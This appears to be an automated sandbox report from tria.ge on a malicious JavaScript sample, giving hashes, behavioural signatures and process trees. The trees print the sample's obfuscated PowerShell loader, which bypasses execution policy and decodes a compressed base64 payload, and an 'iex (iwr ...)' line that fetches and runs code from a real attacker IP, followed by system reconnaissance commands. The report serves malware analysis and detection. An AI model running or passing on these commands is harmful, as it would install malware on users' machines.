Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
04/01/2023, 12:56
Static task
static1
Behavioral task
behavioral1
Sample
55e020dbea48939cdd285ea106713f40bc077e2c.js
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
55e020dbea48939cdd285ea106713f40bc077e2c.js
Resource
win10v2004-20221111-en
General
-
Target
55e020dbea48939cdd285ea106713f40bc077e2c.js
-
Size
43KB
-
MD5
cd8ce0411e414f67fa7e34b06004314f
-
SHA1
55e020dbea48939cdd285ea106713f40bc077e2c
-
SHA256
0442f029601c5925d346260e512770beb5a9a28ef4ac9e2da5d1b0e7d27341a6
-
SHA512
322b0c0a1166f392150d46f529ab3475954b5255f955e893bffc49c61865a2f953dc3dd598ca13f9954b61fa79bea797ec7e740ab7cab48d6d5dda08d9631e03
-
SSDEEP
768:4aPlutIv0NmQCjO2rpReJk3zBE5kxuALjWV+yLFz9ohcqJ8H:uK1j1syDaVh9onKH
Malware Config
Extracted
http://159.203.143.66/r/
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 28 2876 powershell.exe 38 2876 powershell.exe 38 2876 powershell.exe 45 2888 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4228 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2768 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2372 powershell.exe 2372 powershell.exe 2876 powershell.exe 2876 powershell.exe 2888 powershell.exe 2888 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 4356 whoami.exe Token: SeIncreaseQuotaPrivilege 2372 powershell.exe Token: SeSecurityPrivilege 2372 powershell.exe Token: SeTakeOwnershipPrivilege 2372 powershell.exe Token: SeLoadDriverPrivilege 2372 powershell.exe Token: SeSystemProfilePrivilege 2372 powershell.exe Token: SeSystemtimePrivilege 2372 powershell.exe Token: SeProfSingleProcessPrivilege 2372 powershell.exe Token: SeIncBasePriorityPrivilege 2372 powershell.exe Token: SeCreatePagefilePrivilege 2372 powershell.exe Token: SeBackupPrivilege 2372 powershell.exe Token: SeRestorePrivilege 2372 powershell.exe Token: SeShutdownPrivilege 2372 powershell.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeSystemEnvironmentPrivilege 2372 powershell.exe Token: SeRemoteShutdownPrivilege 2372 powershell.exe Token: SeUndockPrivilege 2372 powershell.exe Token: SeManageVolumePrivilege 2372 powershell.exe Token: 33 2372 powershell.exe Token: 34 2372 powershell.exe Token: 35 2372 powershell.exe Token: 36 2372 powershell.exe Token: SeIncreaseQuotaPrivilege 2372 powershell.exe Token: SeSecurityPrivilege 2372 powershell.exe Token: SeTakeOwnershipPrivilege 2372 powershell.exe Token: SeLoadDriverPrivilege 2372 powershell.exe Token: SeSystemProfilePrivilege 2372 powershell.exe Token: SeSystemtimePrivilege 2372 powershell.exe Token: SeProfSingleProcessPrivilege 2372 powershell.exe Token: SeIncBasePriorityPrivilege 2372 powershell.exe Token: SeCreatePagefilePrivilege 2372 powershell.exe Token: SeBackupPrivilege 2372 powershell.exe Token: SeRestorePrivilege 2372 powershell.exe Token: SeShutdownPrivilege 2372 powershell.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeSystemEnvironmentPrivilege 2372 powershell.exe Token: SeRemoteShutdownPrivilege 2372 powershell.exe Token: SeUndockPrivilege 2372 powershell.exe Token: SeManageVolumePrivilege 2372 powershell.exe Token: 33 2372 powershell.exe Token: 34 2372 powershell.exe Token: 35 2372 powershell.exe Token: 36 2372 powershell.exe Token: SeIncreaseQuotaPrivilege 2372 powershell.exe Token: SeSecurityPrivilege 2372 powershell.exe Token: SeTakeOwnershipPrivilege 2372 powershell.exe Token: SeLoadDriverPrivilege 2372 powershell.exe Token: SeSystemProfilePrivilege 2372 powershell.exe Token: SeSystemtimePrivilege 2372 powershell.exe Token: SeProfSingleProcessPrivilege 2372 powershell.exe Token: SeIncBasePriorityPrivilege 2372 powershell.exe Token: SeCreatePagefilePrivilege 2372 powershell.exe Token: SeBackupPrivilege 2372 powershell.exe Token: SeRestorePrivilege 2372 powershell.exe Token: SeShutdownPrivilege 2372 powershell.exe Token: SeDebugPrivilege 2372 powershell.exe Token: SeSystemEnvironmentPrivilege 2372 powershell.exe Token: SeRemoteShutdownPrivilege 2372 powershell.exe Token: SeUndockPrivilege 2372 powershell.exe Token: SeManageVolumePrivilege 2372 powershell.exe Token: 33 2372 powershell.exe Token: 34 2372 powershell.exe Token: 35 2372 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4076 wrote to memory of 4460 4076 wscript.exe 89 PID 4076 wrote to memory of 4460 4076 wscript.exe 89 PID 4460 wrote to memory of 2372 4460 cmD.exe 91 PID 4460 wrote to memory of 2372 4460 cmD.exe 91 PID 2372 wrote to memory of 4356 2372 powershell.exe 92 PID 2372 wrote to memory of 4356 2372 powershell.exe 92 PID 1912 wrote to memory of 2876 1912 WScript.exe 95 PID 1912 wrote to memory of 2876 1912 WScript.exe 95 PID 2876 wrote to memory of 3452 2876 powershell.exe 97 PID 2876 wrote to memory of 3452 2876 powershell.exe 97 PID 2876 wrote to memory of 2768 2876 powershell.exe 98 PID 2876 wrote to memory of 2768 2876 powershell.exe 98 PID 2876 wrote to memory of 5060 2876 powershell.exe 101 PID 2876 wrote to memory of 5060 2876 powershell.exe 101 PID 2876 wrote to memory of 3840 2876 powershell.exe 102 PID 2876 wrote to memory of 3840 2876 powershell.exe 102 PID 2876 wrote to memory of 4228 2876 powershell.exe 103 PID 2876 wrote to memory of 4228 2876 powershell.exe 103 PID 1040 wrote to memory of 2888 1040 WScript.exe 108 PID 1040 wrote to memory of 2888 1040 WScript.exe 108
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\55e020dbea48939cdd285ea106713f40bc077e2c.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\wiNDOWS\SYsTEM32\cmD.exe"C:\wiNDOWS\SYsTEM32\cmD.exe" /c PoweRSheLL -execUTiONPoLic BypasS "& ((gV '*mDr*').naME[3,11,2]-Join'') ( nEw-oBJecT syStEm.iO.CompREsSiON.defLAtEStReAM( [SYstEM.io.MEmOryStream] [CoNVErT]::FrOmbASe64sTRING('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') , [sYsTEm.io.ComPREsSiOn.coMPreSsioNmODe]::DEcOmPreSs) |fOrEACH-obJEcT{ nEw-oBJecT sySTEM.Io.sTReaMreadeR( $_, [teXt.EnCODInG]::AsCiI)} ).ReaDtoenD( ) "2⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoweRSheLL -execUTiONPoLic BypasS "& ((gV '*mDr*').naME[3,11,2]-Join'') ( nEw-oBJecT syStEm.iO.CompREsSiON.defLAtEStReAM( [SYstEM.io.MEmOryStream] [CoNVErT]::FrOmbASe64sTRING('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') , [sYsTEm.io.ComPREsSiOn.coMPreSsioNmODe]::DEcOmPreSs) |fOrEACH-obJEcT{ nEw-oBJecT sySTEM.Io.sTReaMreadeR( $_, [teXt.EnCODInG]::AsCiI)} ).ReaDtoenD( ) "3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4356
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\A35CA9DCCEE0504C.vbs" "iex (iwr -useb http://159.203.143.66/r/emailbill/A0FB558A27C8404B)"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.203.143.66/r/emailbill/A0FB558A27C8404B)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe"3⤵PID:3452
-
-
C:\Windows\system32\systeminfo.exe"C:\Windows\system32\systeminfo.exe"3⤵
- Gathers system information
PID:2768
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵PID:5060
-
-
C:\Windows\system32\nltest.exe"C:\Windows\system32\nltest.exe" /domain_trusts3⤵PID:3840
-
-
C:\Windows\system32\tasklist.exe"C:\Windows\system32\tasklist.exe"3⤵
- Enumerates processes with tasklist
PID:4228
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1420
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\A35CA9DCCEE0504C.vbs" "iex (iwr -useb http://159.203.143.66/r/emailbill/A0FB558A27C8404B)"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.203.143.66/r/emailbill/A0FB558A27C8404B)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2888
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
Filesize
106B
MD529814eb775761c5088028d1907f48c55
SHA1cb369ec71c0a44b9b9411edf956efbb5654ab26e
SHA256ceb3b2cce642a3dcda3a370c282fd0ae6daf7521a44350d302b4a1351e4ac3db
SHA512a7ebcab691e6bbe52f150de7e1515f341bab3756c0941fc221d1aa40c54983b73158ff4037b11c18e1fddc2e634ea0fd5ab898cf716b02163c10d98159a7b3c1
-
Filesize
1KB
MD54fb90af35e4c5cf754c6d7beca6c0b4a
SHA16ba035166e8c66ee443fe2175ca32f8966ebd3b7
SHA256feef81c76e2e18c1ba13467be824388a4e2e834666d3ad04ed615945375b94cf
SHA512067c3b62372544bc61b483ef91010f52088719b697b1ea5bd3877700444ac5d6d11d1523b108bba3d2af3c19abfff46a18f2445639249ff2d8a67011ecfc457e